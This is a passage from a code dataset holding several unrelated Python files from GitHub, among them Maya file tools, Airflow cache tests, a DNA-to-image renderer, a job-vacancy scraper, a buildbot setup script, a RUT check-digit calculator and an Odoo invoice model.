\"\"\"Autosave: Delete All\"\"\"\n files = mtk.get_recent_autosave()\n for file in files:\n try:\n os.remove(file)\n\n except Exception as error:\n print(error)\n\n @SlotsMaya.hide_main\n def b007(self):\n \"\"\"Import file\"\"\"\n self.sb.file.cmb003.call_slot(1)\n\n @SlotsMaya.hide_main\n def b008(self):\n \"\"\"Export Selection\"\"\"\n self.sb.file.cmb004.call_slot(1)\n\n def b015(self):\n \"\"\"Remove String From Object Names.\"\"\"\n # asterisk denotes startswith*, *endswith, *contains*\n from_ = str(self.sb.file.t000.text())\n to = str(self.sb.file.t001.text())\n replace = self.sb.file.chk004.isChecked()\n selected = self.sb.file.chk005.isChecked()\n\n objects = pm.ls(from_) # Stores a list of all objects starting with 'from_'\n if selected: # get user selected objects instead\n objects = pm.ls(sl=True)\n from_ = from_.strip(\"*\") # strip modifier asterisk from user input\n\n for obj in objects: # Get a list of it's direct parent\n relatives = pm.listRelatives(obj, parent=1)\n # If that parent starts with group, it came in root level and is pasted in a group, so ungroup it\n if \"group*\" in relatives:\n relatives[0].ungroup()\n\n newName = to\n if replace:\n newName = obj.replace(from_, to)\n pm.rename(obj, newName) # Rename the object with the new name\n\n\n# --------------------------------------------------------------------------------------------\n\n# module name\n# print(__name__)\n# --------------------------------------------------------------------------------------------\n# Notes\n# --------------------------------------------------------------------------------------------\n","repo_name":"m3trik/tentacle","sub_path":"tentacle/slots/maya/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":11843,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"35"} +{"seq_id":"32675336613","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow_breeze.utils.cache import (\n check_if_cache_exists,\n check_if_values_allowed,\n delete_cache,\n read_from_cache_file,\n)\n\nAIRFLOW_SOURCES = Path(__file__).parents[3].resolve()\n\n\n@pytest.mark.parametrize(\n \"parameter, value, result, exception\",\n [\n (\"backend\", \"mysql\", (True, [\"sqlite\", \"mysql\", \"postgres\", \"mssql\"]), None),\n (\"backend\", \"xxx\", (False, [\"sqlite\", \"mysql\", \"postgres\", \"mssql\"]), None),\n (\"python_major_minor_version\", \"3.8\", (True, [\"3.8\", \"3.9\", \"3.10\", \"3.11\"]), None),\n (\"python_major_minor_version\", \"3.7\", (False, [\"3.8\", \"3.9\", \"3.10\", \"3.11\"]), None),\n (\"missing\", \"value\", None, AttributeError),\n ],\n)\ndef test_allowed_values(parameter, value, result, exception):\n if exception:\n with pytest.raises(expected_exception=exception):\n check_if_values_allowed(parameter, value)\n else:\n assert result == check_if_values_allowed(parameter, value)\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\ndef test_check_if_cache_exists(path):\n check_if_cache_exists(\"test_param\")\n path.assert_called_once_with(AIRFLOW_SOURCES / \".build\")\n\n\n@pytest.mark.parametrize(\n \"param\",\n [\n \"test_param\",\n \"mysql_version\",\n \"executor\",\n ],\n)\ndef test_read_from_cache_file(param):\n param_value = read_from_cache_file(param.upper())\n if param_value is None:\n assert None is param_value\n else:\n allowed, param_list = check_if_values_allowed(param, param_value)\n if allowed:\n assert param_value in param_list\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\n@mock.patch(\"airflow_breeze.utils.cache.check_if_cache_exists\")\ndef test_delete_cache_exists(mock_check_if_cache_exists, mock_path):\n param = \"MYSQL_VERSION\"\n mock_check_if_cache_exists.return_value = True\n cache_deleted = delete_cache(param)\n mock_path.assert_called_with(AIRFLOW_SOURCES / \".build\")\n assert cache_deleted\n\n\n@mock.patch(\"airflow_breeze.utils.cache.Path\")\n@mock.patch(\"airflow_breeze.utils.cache.check_if_cache_exists\")\ndef test_delete_cache_not_exists(mock_check_if_cache_exists, mock_path):\n param = \"TEST_PARAM\"\n mock_check_if_cache_exists.return_value = False\n cache_deleted = delete_cache(param)\n assert not cache_deleted\n","repo_name":"a0x8o/airflow","sub_path":"dev/breeze/tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"4758933481","text":"# Creates an image from a genetic sequence.\n# Capital letters are the same value as their lowercase counterparts.\n# Thymine (T) and Uracil (U) are treated the same.\n\n# Cole Lightfoot - 30th March 2021\n\nimport sys\nimport math\nimport os.path\nimport argparse\nimport subprocess\nimport ctypes as c\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageColor\nimport multiprocessing as mp\n\n# Command line arguments.\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\n \"--file\",\n type=str,\n default=None,\n help='Directory of images you want to use. This should be a single level directory.',\n)\nparser.add_argument(\n \"--scale\",\n type=int,\n default=1,\n help=\"How much to multiply the scale of the image by. 1 = 1px per base, 2=4px, 4=8px, etc...\",\n)\nparser.add_argument(\n \"--threads\",\n type=int,\n default=mp.cpu_count(),\n help=\"Number of threads to use. Automatically uses as many as your cpu has.\",\n)\nparser.add_argument(\n \"--A\",\n type=str,\n default=None,\n help='Hex colour to use for Adenine',\n)\nparser.add_argument(\n \"--T\",\n type=str,\n default=None,\n help='Hex colour to use for Thymine',\n)\nparser.add_argument(\n \"--C\",\n type=str,\n default=None,\n help='Hex colour to use for Cytosine',\n)\nparser.add_argument(\n \"--G\",\n type=str,\n default=None,\n help='Hex colour to use for Guanine',\n)\nparser.add_argument('--no_optimize', action=\"store_true\", help='Do not compress and optimize the final png, this will save time and RAM.')\nargs = parser.parse_args()\n\n# Catch possible issues with arguments\nif(args.scale <= 0):\n raise ValueError(\"Scale multiplier cannot be 0 or less.\")\nif(args.threads < 1):\n raise ValueError(\"Invalid number of threads. Must be greater than zero.\")\nif(args.threads > mp.cpu_count()):\n if(input(\"\\nWarning, you are going to use \" + str(args.threads) + \" threads. Your CPU has \" + str(mp.cpu_count()) + \" threads.\\nThis may cause lower performance than if you used \" + str(mp.cpu_count()) + \" threads.\\nDo you want to continue? (y/N): \").lower() != \"y\"):\n exit()\n\n# Finds the smallest sized square which can fit all the basepairs\ndef findSquareSize(gene):\n dim = math.sqrt(len(gene))\n # If length of sequence is not a perfect square, add 1. Image will have blank spots at end.\n if(dim%1 != 0):\n dim += 1\n return int(dim)\n\n# Get the input sequence, we need to switch the terminal mode to allow\n# inputs greater than 4095 bases. We get the sequence and switch it back.\ndef getGeneFromCLI():\n subprocess.check_call([\"stty\",\"-icanon\"]) # Comment me if input errors happen.\n inputStr = input(\"Input the sequence: \")\n subprocess.check_call([\"stty\",\"icanon\"]) # Comment me if input errors happen.\n return inputStr\n\n# Get the contents of a file and remove newline characters, then return as a string.\ndef getGeneFromFile(f):\n try:\n with open(f, 'r') as file:\n return file.read().replace('\\n', '')\n except:\n raise FileNotFoundError(\"Could not find / open the file.\", f)\n\n# Convert a hex value into a RGB value. Used for custom colours.\ndef hex2RGB(colour):\n # Check if user did not add \"#\" to start, add it if not.\n if(colour[0] != \"#\"):\n colour = \"#\" + colour\n if(len(colour) != 7):\n raise ValueError(colour + \" Is not a valid hex code for a colour. Incorrect number of characters.\")\n for i in colour:\n if(not(ord(i) > 47 and ord(i) < 58 or ord(i) > 64 and ord(i) < 71 or ord(i) > 97 and ord(i) < 103 or ord(i) == 35)):\n raise ValueError(colour + \" Is not a valid hex code for a colour. Invalid character: \" + str(i))\n return ImageColor.getcolor(colour, \"RGB\")\n\n# Save the image and apply scaling\ndef saveImg(array, dim):\n # Generate the image.\n out = Image.fromarray(array, mode=\"RGB\")\n\n # Scale up the image\n if(args.scale != 1):\n out = out.resize((dim*args.scale, dim*args.scale), resample=Image.NEAREST)\n\n # Save the image, do not overwrite any previous images.\n path = os.getcwd()\n fileName = \"GenePic\"\n ext = \".png\"\n if(os.path.isfile(os.path.join(path, fileName + ext))):\n num = 2\n while(os.path.isfile(os.path.join(path, fileName + str(num) + ext))):\n num += 1\n if(not args.no_optimize):\n out.save(os.path.join(path, fileName + str(num) + ext), optimize = True, compress_level = 9)\n else:\n out.save(os.path.join(path, fileName + str(num) + ext))\n print(\"Image with \" + str(len(sequence)) + \" bases saved to \" + os.path.join(path, fileName + str(num) + ext))\n else:\n if(not args.no_optimize):\n out.save(os.path.join(path, fileName + ext), optimize = True, compress_level = 9)\n else:\n out.save(os.path.join(path, fileName + ext))\n print(\"Image with \" + str(len(sequence)) + \" bases saved to \" + os.path.join(path, fileName + ext))\n\n# Associate the bases with their proper colours and places the rgb values into the numpy array.\ndef base2color(lock, mp_arr, mp_arr2, tdone, gene, splits, dim, id):\n # Turn the colours array into a numpy array, but still use the same shared memory between threads.\n arr = np.frombuffer(mp_arr.get_obj(), dtype=np.uint8)\n colours = arr.reshape((dim,dim,3))\n\n # Turn the tmp_colours array into a numpy array, but still use the same shared memory between threads.\n arr2 = np.frombuffer(mp_arr2.get_obj(), dtype=np.uint8)\n tmp_colours = arr2.reshape((args.threads,lastThreadSplits,dim,3))\n\n # Select the proper tmp_colours array for this thread. \n curColours = tmp_colours[id]\n \n # Index of our position in the genetic sequence.\n index = 0\n # Vertical\n for i in range(splits):\n max = dim\n if(len(gene) - (i+1)*dim <= 0 and id+1 == args.threads):\n max = len(gene) - (i)*dim\n # Horizontal\n for j in range(max):\n if(ord(gene[index]) < 86):\n # Cytosine\n if(ord(gene[index]) == 67):\n curColours[i, j] = cytosineColour\n # Guanine\n elif(ord(gene[index]) == 71):\n curColours[i, j] = guanineColour\n # Adenine\n elif(ord(gene[index]) == 65):\n curColours[i, j] = adenineColour\n # Thymine or Uracil\n elif(ord(gene[index]) == 84 or ord(gene[index]) == 85):\n curColours[i, j] = thymineColour\n #Lowercase\n elif(ord(gene[index]) > 85):\n # Cytosine\n if(ord(gene[index]) == 99):\n curColours[i, j] = cytosineColour\n # Guanine\n elif(ord(gene[index]) == 103):\n curColours[i, j] = guanineColour\n # Adenine\n elif(ord(gene[index]) == 97):\n curColours[i, j] = adenineColour\n # Thymine or Uracil\n elif(ord(gene[index]) == 116 or ord(gene[index]) == 117):\n curColours[i, j] = thymineColour\n\n # Keep track of where we are in the sequence and break once sequence is finished.\n index += 1\n # Clear RAM\n geneThread[id] = \"\"\n t_done.value+=1\n isLast(dim, colours, tmp_colours)\n\ndef isLast(dim, colours, tmp_colours):\n global t_done\n global splitsPerThread\n if(t_done.value >= args.threads):\n for i in range(args.threads):\n if(i == args.threads-1):\n colours[(args.threads - 1)*splitsPerThread:(args.threads-1)*splitsPerThread + lastThreadSplits, 0:dim] = tmp_colours[i]\n else:\n tmp = np.resize(tmp_colours[i], (splitsPerThread, dim, 3))\n colours[i*splitsPerThread:(i+1)*splitsPerThread, 0:dim] = tmp\n\n print(\"Done parsing sequence, saving image now...\")\n\n # Save the image and apply scaling.\n saveImg(colours, dim)\n else:\n sys.exit()\n\ndef geneSplit(gene, dim):\n splitGene = []\n for i in range(dim):\n splitGene.append(gene[(dim*i):(dim*(i+1))])\n\n splitsPerThread = int(dim/(args.threads))\n lastThreadSplits = splitsPerThread\n\n if(dim%args.threads != 0):\n splitsPerThread = int(dim/(args.threads))\n lastThreadSplits = dim - (args.threads-1)*splitsPerThread\n\n geneThread = [gene[i:i+(splitsPerThread*dim)] for i in range(0, len(gene), (splitsPerThread*dim))]\n if(args.threads>1):\n geneThread[args.threads-1] += geneThread[args.threads]\n geneThread[args.threads] = \"\"\n \n return geneThread, lastThreadSplits, splitsPerThread\n\n# Hold the genetic sequence as a string.\nsequence = \"\"\n\n# Default base colours.\nadenineColour = [239, 71, 111]\nthymineColour = [255, 209, 102]\ncytosineColour = [6, 201, 150]\nguanineColour = [17, 138, 178]\nuracilColour = [204, 102, 255]\n\n# See if custom colours are specified.\nif(args.A is not None):\n adenineColour = hex2RGB(args.A)\nif(args.T is not None):\n thymineColour = hex2RGB(args.T)\nif(args.C is not None):\n cytosineColour = hex2RGB(args.C)\nif(args.G is not None):\n guanineColour = hex2RGB(args.G)\n\n# See how user wants to input the sequence.\nif(args.file is not None):\n sequence = getGeneFromFile(args.file)\nelse:\n sequence = getGeneFromCLI()\n\nsequenceLength = len(sequence)\nprint(\"Length: \"+ str(sequenceLength) + \" bases\")\n\n# Find optimal size square for the array.\ndim = findSquareSize(sequence)\n\n# See if there is any point to using multiple threads.\nif(dim < args.threads):\n args.threads = dim\n\nprint(\"Array Dimmention: \" + str(dim) + \" bases\")\n\ngeneThread, lastThreadSplits, splitsPerThread = geneSplit(sequence, dim)\n\n# Values which need to be writable and viewable by all threads.\nt_done = mp.Value('i', 0)\n# Allocate memory for the arrays. We will then turn these into numpy arrays inside each thread.\nmp_arr = mp.Array(c.c_uint8, dim*dim*3)\nmp_arr2 = mp.Array(c.c_uint8, lastThreadSplits*dim*3*args.threads)\n\nlock = mp.Lock()\nj = splitsPerThread\n# Start the threads\nfor i in range(args.threads):\n # If last thread, pass in the proper number of splits for the last thread.\n if(i == args.threads-1):\n j = lastThreadSplits\n mp.Process(target=base2color, args=(lock, mp_arr, mp_arr2, t_done, geneThread[i], j, dim, i,)).start()","repo_name":"cole8888/Gene2Pic","sub_path":"gene2pic.py","file_name":"gene2pic.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32653808461","text":"# Collatz Conjecture - Start with a number n > 1.\n# Find the number of steps it takes to reach one using the following process:\n# If n is even, divide it by 2. If n is odd, multiply it by 3 and add 1.\n\n\n# def collatz(num):\n# counter = 0\n# # Determine if num is > 1\n# while num > 1:\n# # if num is even divide by 2\n# if num % 2 == 0:\n# num = num // 2\n# counter += 1\n# # if num is odd multiply by 3 and add 1\n# else:\n# num = (num * 3) + 1\n# counter += 1\n# return counter\n# print(collatz(25))\n\ndef re_collatz(num, counter=0):\n if num <= 1:\n return counter\n elif num % 2 == 0:\n return re_collatz(num//2, counter + 1)\n else:\n return re_collatz((num*3) + 1, counter + 1)\n\n\nprint(re_collatz(10))\n","repo_name":"puczkowskyjp/project_list","sub_path":"collatz.conjecture.py","file_name":"collatz.conjecture.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6387962628","text":"contacts={\"number\":4,\n \"students\":[\n {'name':'name1','email':'email1'},\n {'name':'name2','email':'email2'},\n {'name':'name3','email':'email3'},\n {'name':'name4','email':'email4'}\n ]\n\n}\n#capture only the email ids of all students\nfor i in contacts[\"students\"]:\n print(i) #this will print both name and email ids\n\nfor i in contacts[\"students\"]:\n print(i[\"email\"])","repo_name":"8rkprashanth/python","sub_path":"dictinory_insidedictinory.py","file_name":"dictinory_insidedictinory.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22253797801","text":"import json\nimport requests\nimport time\nimport pandas as pd\n\n\ndef getPage(page=0):\n \"\"\"\n Создаем метод для получения страницы со списком вакансий.\n Аргументы:\n page - Индекс страницы, начинается с 0. Значение по умолчанию 0, т.е. первая страница\n \"\"\"\n\n params = {\n 'specialization': 1,\n 'date_from': '2022-12-10',\n 'date_to': '2022-12-10',\n 'page': page,\n 'per_page': 100\n }\n\n req = requests.get('https://api.hh.ru/vacancies', params)\n data = req.content.decode()\n req.close()\n return data\n\n\nfor page in range(0, 30):\n\n jsObj = json.loads(getPage(page))\n nextFileName = 'search.json'\n\n f = open(nextFileName, mode='w', encoding='utf8')\n f.write(json.dumps(jsObj, ensure_ascii=False))\n f.close()\n\n if (jsObj['pages'] - page) <= 1:\n break\n\n time.sleep(0.25)\n print(1)\nprint('Старницы поиска собраны')\ndt = []\ndf2 = pd.read_json('search.json')\nfor js in df2['items']:\n if js['salary'] != None:\n salary_from = js['salary']['from']\n salaty_to = js['salary']['to']\n salary_currency = js['salary']['currency']\n else:\n salary_from = None\n salaty_to = None\n salary_currency = None\n dt.append([\n js['name'],\n salary_from,\n salaty_to,\n salary_currency,\n js['published_at'],\n ])\n\ndf = pd.DataFrame(dt, columns=['name', 'salary_from', 'salary_to','salary_currency','published_at'])\ndf.to_csv('searchHH.csv', index=False)\n\n","repo_name":"Maksiz03/Zavyalov","sub_path":"3.3.3.py","file_name":"3.3.3.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3413885151","text":"#!/usr/bin/env python\n#\n# This software may be freely redistributed under the terms of the GNU\n# general public license.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\"\"\"\nStandard setup script.\n\"\"\"\n\nimport sys\nimport os\nfrom distutils.core import setup\nfrom distutils.command.install_data import install_data\nfrom distutils.command.sdist import sdist\n\nfrom buildslave import version\n\nscripts = [\"bin/buildslave\"]\n# sdist is usually run on a non-Windows platform, but the buildslave.bat file\n# still needs to get packaged.\nif 'sdist' in sys.argv or sys.platform == 'win32':\n scripts.append(\"contrib/windows/buildslave.bat\")\n scripts.append(\"contrib/windows/buildbot_service.py\")\n\nclass our_install_data(install_data):\n\n def finalize_options(self):\n self.set_undefined_options('install',\n ('install_lib', 'install_dir'),\n )\n install_data.finalize_options(self)\n\n def run(self):\n install_data.run(self)\n # ensure there's a buildslave/VERSION file\n fn = os.path.join(self.install_dir, 'buildslave', 'VERSION')\n open(fn, 'w').write(version)\n self.outfiles.append(fn)\n\nclass our_sdist(sdist):\n\n def make_release_tree(self, base_dir, files):\n sdist.make_release_tree(self, base_dir, files)\n # ensure there's a buildslave/VERSION file\n fn = os.path.join(base_dir, 'buildslave', 'VERSION')\n open(fn, 'w').write(version)\n\nsetup_args = {\n 'name': \"buildbot-slave\",\n 'version': version,\n 'description': \"BuildBot Slave Daemon\",\n 'long_description': \"See the 'buildbot' package for details\",\n 'author': \"Brian Warner\",\n 'author_email': \"warner-buildbot@lothar.com\",\n 'maintainer': \"Dustin J. Mitchell\",\n 'maintainer_email': \"dustin@v.igoro.us\",\n 'url': \"http://buildbot.net/\",\n 'license': \"GNU GPL\",\n 'classifiers': [\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: No Input/Output (Daemon)',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Software Development :: Testing',\n ],\n\n 'packages': [\n \"buildslave\",\n \"buildslave.commands\",\n \"buildslave.scripts\",\n \"buildslave.test\",\n \"buildslave.test.fake\",\n \"buildslave.test.util\",\n \"buildslave.test.unit\",\n ],\n 'scripts': scripts,\n # mention data_files, even if empty, so install_data is called and\n # VERSION gets copied\n 'data_files': [(\"buildslave\", [])],\n 'cmdclass': {\n 'install_data': our_install_data,\n 'sdist': our_sdist\n }\n }\n\n# set zip_safe to false to force Windows installs to always unpack eggs\n# into directories, which seems to work better --\n# see http://buildbot.net/trac/ticket/907\nif sys.platform == \"win32\":\n setup_args['zip_safe'] = False\n\ntry:\n # If setuptools is installed, then we'll add setuptools-specific arguments\n # to the setup args.\n import setuptools #@UnusedImport\nexcept ImportError:\n setup_args['scripts'] = [\n 'bin/buildslave'\n ]\nelse:\n setup_args['install_requires'] = [\n 'twisted >= 2.0.0',\n ]\n setup_args['entry_points'] = {\n 'console_scripts': [\n 'buildslave = buildslave.scripts.runner:run',\n ],\n }\n\nsetup(**setup_args)\n","repo_name":"paperclip/buildbot","sub_path":"slave/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"29760866796","text":"from decimal import Decimal\nfrom robot.api.deco import keyword\nfrom selenium import webdriver\nimport string\nimport pandas as pd\nimport requests\nimport unittest\n\nclass APIMethod():\n def __init__(self,url,methodtype,data=None,header=None,encodingtype=\"utf-8\"):\n self.url = url\n self.methodtype = methodtype\n self.data = data\n self.header = header\n self.encodingtype = encodingtype\n\n def ExecuteMethod(self):\n if self.methodtype == \"get\":\n req = requests.get(url=self.url,params=self.data,headers=self.header)\n elif self.methodtype == \"post\":\n req = requests.post(url=self.url,data=self.data,headers=self.header)\n print(\"Response status code is : \" + f'{req.status_code}')\n print(\"Response content is : \" + f'{req.content.decode(self.encodingtype)}')\n print(\"Response header is : \" + f'{req.headers}')\n print(\"Response cookie is : \" + f'{req.cookies}')\n print(\"Response apparent_encoding is : \" + f'{req.apparent_encoding}')\n return req\n\nclass APITest(unittest.TestCase):\n url = \"https://httpbin.org\"\n def test_001(self):\n #self.url = self.url + \"/get\"+\"?name=xx&age=yy\" 方法1\n self.url = self.url + \"/get\"\n params = {\"name\":\"张三\",\"age\":\"yy\"}\n req1 = requests.get(self.url,params=params)\n print(\"-get 请求-\")\n print(req1.headers)\n print(req1.cookies)\n print(req1.encoding) #编码方式 根据header判断\n print(req1.apparent_encoding) #编码方式 根据response content判断\n print(req1.status_code)\n print(req1.text) #默认以encoding方式解码\n print(req1.content.decode(\"unicode-escape\")) #指定解码方式\n #print(req1.content.decode(\"utf8\"))\n print(\"-session和cookie-\")\n s = requests.Session()\n s.headers={\n \"Cookies\": \"213135151\"\n }\n s.headers.update({\"TEST\":\"1\"})\n print(s.headers)\n req2 = s.get(self.url, params=params, headers={\"Test2\":\"2\"})\n print(req2.text)\n req3 = s.get(self.url, params=params)\n print(req3.text)\n #session可以为请求方法��供缺省数据,比如第一次请求中的{'Test': '1'}就是缺省数据,此时的缺省数据就是跨请求参数。\n #方法级别的参数不会被跨请求保持,比如第二次请求时,没有携带headers={'Test2': '2'},返回的结果中也没有,说明该参数没有在第一次请求后被保持住。\n print(\"--------------case1 finished---------------\")\n\n def test_002(self):\n # 请求URL\n url = \"https://httpbin.org/post\"\n # 请求数据\n data = {\n \"username\": \"slaine\",\n \"password\": 123456\n }\n # 发送请求,一般还需要提供header信息,此处为demo,暂不关注\n reponse1 = requests.post(url=url, data=data)\n res_json = reponse1.json()\n print(res_json)\n flag = reponse1.status_code == 200 or res_json[\"status\"] == 200 or res_json[\"msg\"] == \"login sucess\"\n # 假如http code为200,status为“200” msg为“login sucess”则测试通过\n if flag:\n print(\"pass\")\n else:\n print(\"fail\")\n print(\"--------------case2 finished---------------\")\n\n def test_003(self):\n testapi = APIMethod(\"https://httpbin.org/post\", \"post\", {'name':'Slaine','age':'18'}, header={\"test\":\"slaine\"})\n testapi.ExecuteMethod()\n\nif __name__ ==\"__main__\":\n suite = unittest.TestSuite()\n #suite.addTest(APITest(\"test_003\"))","repo_name":"gkj22222/PipelineTest","sub_path":"rf_test/test_project1/py_keyword/requesttest1.py","file_name":"requesttest1.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20773740967","text":"import string\n\nclass Del:\n def __init__(self, keep=string.digits):\n self.comp = dict((ord(c), c) for c in keep)\n\n def __getitem__(self, k):\n return self.comp.get(k)\n\nDD = Del()\n\ndef cnmops_parser(path):\n\n variant_list = []\n\n with open(path, 'r') as file:\n for line in file:\n if not line.lstrip().startswith('#'):\n variant_list.append(line.strip().split('\\t'))\n file.close()\n\n complete_list = []\n\n count = 0\n for entry in variant_list:\n if 100 <= int(entry[4]) <= 900:\n if int(entry[3].translate(DD)) > 2 and int(entry[2])-int(entry[1]) >= 50:\n sublist = [entry[0], entry[1], entry[2], 'INS']\n sublist.append('_'.join(sublist))\n number_del += 1\n elif int(entry[3].translate(DD)) < 2:\n sublist = [entry[0], entry[1], entry[2], 'DEL']\n sublist.append('_'.join(sublist))\n number_del += 1\n complete_list.append(sublist)\n\n else:\n count += 1\n\n return(complete_list)","repo_name":"Joshtron/benchee","sub_path":"benchee/cnmops_func.py","file_name":"cnmops_func.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70704971942","text":"from collections import deque\n\nfor tc in range(int(input())):\n n = int(input())\n indegree = [0]*(n+1)\n graph = [[False] * (n+1) for _ in range(n+1)]\n data = list(map(int, input()))\n for i in range(n):\n for j in range(i+1, n):\n # 1. 자기보다 순위가 낮았던 팀 j 가리키기.\n graph[data[i]][data[j]] = True\n indegree[data[j]] += 1\n\n m = int(input())\n for i in range(m):\n a, b = map(int, input().split())\n # 간선 방향 뒤집기\n if graph[a][b]:\n graph[a][b] = False\n graph[b][a] = True\n indegree[b] -= 1\n indegree[a] += 1\n else:\n graph[a][b] = True\n graph[b][a] = False\n indegree[a] -= 1\n indegree[b] += 1\n\n # 위상정렬 알고리즘 시작\n # [특이 케이스]\n # 1. 사이클이 발생하는 경우, 2. 위상 정렬의 결과가 1개가 아니라 여러개인 경우\n # 위 두가지 해당없다면 오직 하나의 경우만 정답 존재.\n\n result = []\n q = deque()\n\n for i in range(1, n+1):\n if indegree[i] == 0:\n q.append(i)\n\n certain = True # 위상정렬 결과가 하나인 여부\n cycle = False # 그래프 내 사이클이 존재하는 여부\n\n for i in range(n):\n # 큐가 빈 경우는 사이클이 발생했다는 의미\n if len(q) == 0:\n cycle = True\n break\n if len(q) >= 2:\n certain = False\n break\n\n now = q.popleft()\n result.append(now)\n for j in range(1, n+1):\n if graph[now][j]:\n indegree[j] -= 1\n if indegree[j] == 0:\n q.append(j)\n\n\n if cycle:# 사이클이 발생해서 데이터에 일관성이 없어 순위를 정할 수 없다.\n print(\"IMPOSSIBLE\")\n elif not certain: # 정답이 여러개여서 확실한 순위를 정할 수 없다.\n print(\"?\")\n else:\n for i in result:\n print(i, end = ' ')\n print()","repo_name":"dohyun93/python_playground","sub_path":"section18_(유형)_그래프이론문제/18-5.최종 순위.py","file_name":"18-5.최종 순위.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29569683226","text":"# Importing the cycle function from the itertools module.\nfrom itertools import cycle\n\n# Asking the user to input a number and then converting it to an integer.\nrut = int(input(\"Ingrese su rut sin digito verificador: \"))\n\ndef digito_verificador(rut):\n \"\"\"\n It takes the RUT, reverses it, multiplies each digit by a factor, and then sums the results\n \n :param rut: The RUT number you want to validate\n :return: The remainder of the division of the sum of the products of the reversed digits and the\n factors by 11.\n \"\"\"\n reversed_digits = map(int, reversed(str(rut)))\n factors = cycle(range(2, 8))\n s = sum(d * f for d, f in zip(reversed_digits, factors))\n return (-s) % 11\n\n\ndv = digito_verificador(rut)\n\n# The function digito_verificador returns the remainder of the division of the sum of the products of\n# the reversed digits and the factors by 11. If the remainder is 10, the digit verificator is \"k\", and\n# if it is 11, the digit verificator is 0.\nif dv == 10:\n dv = \"k\"\nelif dv == 11:\n dv = 0\n\n# Printing the RUT number and the digit verificator.\nprint(f\"Su rut es: {rut}-{dv}\")\n","repo_name":"rodofla/DLDataScienceG50","sub_path":"Introducción_a_la_programación_con_Python/Desafios/dv.py","file_name":"dv.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72792961061","text":"def createTable(meta, table, server, force):\n import pykdi\n\n # Open META table\n metaTable = pykdi.Table(meta)\n\n # Create the row key\n from util.zero import zeroEncode\n row = zeroEncode(table, '\\x02', '')\n \n # Make sure the table hasn't already been created (note this is a\n # race if there are other processes trying to create the table).\n for r,c,t,v in metaTable.scan('row = %r' % row):\n if force:\n metaTable.erase(r,c,t)\n else:\n raise RuntimeError('table %r already exists' % table)\n \n metaTable.set(row, 'config', 0, 'server = %s\\n' % server)\n metaTable.sync()\n \n\ndef main():\n import optparse\n op = optparse.OptionParser()\n op.add_option('-m','--meta',help='location of META table')\n op.add_option('-t','--table',help='name of table to create')\n op.add_option('-s','--server',help='server assignment for the table')\n op.add_option('-f','--force',help='server assignment for the table',\n action='store_true')\n opt,args = op.parse_args()\n\n if not opt.meta:\n op.error('need --meta')\n if not opt.table:\n op.error('need --table')\n if not opt.server:\n op.error('need --server')\n\n createTable(opt.meta, opt.table, opt.server, opt.force)\n\nif __name__ == '__main__':\n main()\n","repo_name":"bluefish/kdi","sub_path":"src/python/kdi/createTable.py","file_name":"createTable.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"35"} +{"seq_id":"36669187602","text":"from openerp import models, fields, api,_\nfrom openerp.exceptions import except_orm, Warning, RedirectWarning\n\nclass CommercialInvoiceModel(models.Model):\n _name = 'commercial_invoice.model'\n _rec_name = \"name\"\n name = fields.Char(string='Commercial Invoice Number',readonly=True)\n commercial_invoice_created_date = fields.Date(string='Created Date',default=fields.Date.today())\n customer_invoice_id = fields.Many2one('account.invoice',string='Customer Invoice No.')\n pi_id = fields.Many2one('sale.order',string='Proforma Invoice No.', required=True)\n customer_name = fields.Char(string='Customer Name')\n customer_name2 = fields.Char(string='Customer Name')\n customer_full_address = fields.Text(string='Customer Address')\n proforma_invoice_id = fields.Char(string='Proforma Invoice No.')\n proforma_invoice_created_date = fields.Date(string='Proforma Invoice Date')\n transport = fields.Many2one('delivery_transport.model',string='Means of Transport', required=True)\n supplier_factory_name = fields.Char(string='Delivery From Factory Name')\n supplier_factory_address = fields.Text(string='Delivery From Factory Address')\n beneficiary_vat_no = fields.Char(string='Beneficiary VAT No:', required=True)\n erc_no = fields.Char(string='ERC No')\n country_of_origin = fields.Char(string='Country Of Origin')\n country_of_origin2 = fields.Char(string='Country Of Origin')\n destination_address = fields.Text(string='Destination')\n client_shipping_factory_address = fields.Text(string='Factory Address') \n lc_id = 